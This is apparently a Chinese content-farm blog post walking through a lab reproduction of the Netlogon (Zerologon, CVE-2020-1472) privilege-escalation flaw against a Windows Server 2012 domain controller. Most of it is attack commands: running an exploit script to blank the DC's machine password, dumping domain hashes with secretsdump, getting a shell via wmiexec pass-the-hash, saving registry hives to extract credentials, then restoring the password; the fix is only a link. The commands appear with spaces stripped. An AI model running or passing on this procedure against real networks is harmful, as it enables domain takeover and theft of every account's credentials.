Netlogon特权提升漏洞CVE 2020-1472该如何复习
Netlogon特权提升漏洞CVE 2020-1472该如何复习,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
1.复现环境
DC:
os:windows 2012 server
ip:192.168.236.132
攻击机:
os:kali
ip:192.168.236.130
2.影响版本
WindowsServer2008R2forx64-basedSystemsServicePack1WindowsServer2008R2forx64-basedSystemsServicePack1(ServerCoreinstallation)WindowsServer2012WindowsServer2012(ServerCoreinstallation)WindowsServer2012R2WindowsServer2012R2(ServerCoreinstallation)WindowsServer2016WindowsServer2016(ServerCoreinstallation)WindowsServer2019WindowsServer2019(ServerCoreinstallation)WindowsServer,version1903(ServerCoreinstallation)WindowsServer,version1909(ServerCoreinstallation)WindowsServer,version2004(ServerCoreinstallation)
3.域控环境搭建参考文章
sectool/251828.html
4.复现过程
4.1 漏洞验证
POC链接
4.2 漏洞利用
安装最新的Impacket,否则会报错
4.2.1 下载攻击exp
EXP下载
4.2.2 置空密码
python3cve-2020-1472-exploit.pyWIN-F6STUQIU7D8192.168.236.132
4.2.3 获取hash
进入到impacket/examples
python3secretsdump.pyDOMAIN/WIN-F6STUQIU7D8\$@192.168.236.132-just-dc-no-pass
4.2.4 获取shell
python3wmiexec.py-hashes<HASH>DOMAIN/administrator\@IP
4.2.5 获取原hash
regsaveHKLM\SYSTEMsystem.saveregsaveHKLM\SAMsam.saveregsaveHKLM\SECURITYsecurity.savegetsystem.savegetsam.savegetsecurity.savedel/fsystem.savedel/fsam.savedel/fsecurity.saveexit
4.2.6 解析hash
保存$MACHINE.ACC部分:XXXXXXXXXXXXXX:XXXXXXX
python3secretsdump.py-samsam.save-systemsystem.save-securitysecurity.saveLOCAL
4.2.7 恢复hash
恢复链接
python3reinstall_original_pw.pyDC_NETBIOS_NAMEDC_IP_ADDR<ORI_HASH>
4.2.8 验证是否恢复
使用获取hash的命令来验证是否恢复
python3secretsdump.pyDOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR-just-dc-no-pass
5.修复建议
官方修复建议
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注恰卡编程网行业资讯频道,感谢您对恰卡编程网的支持。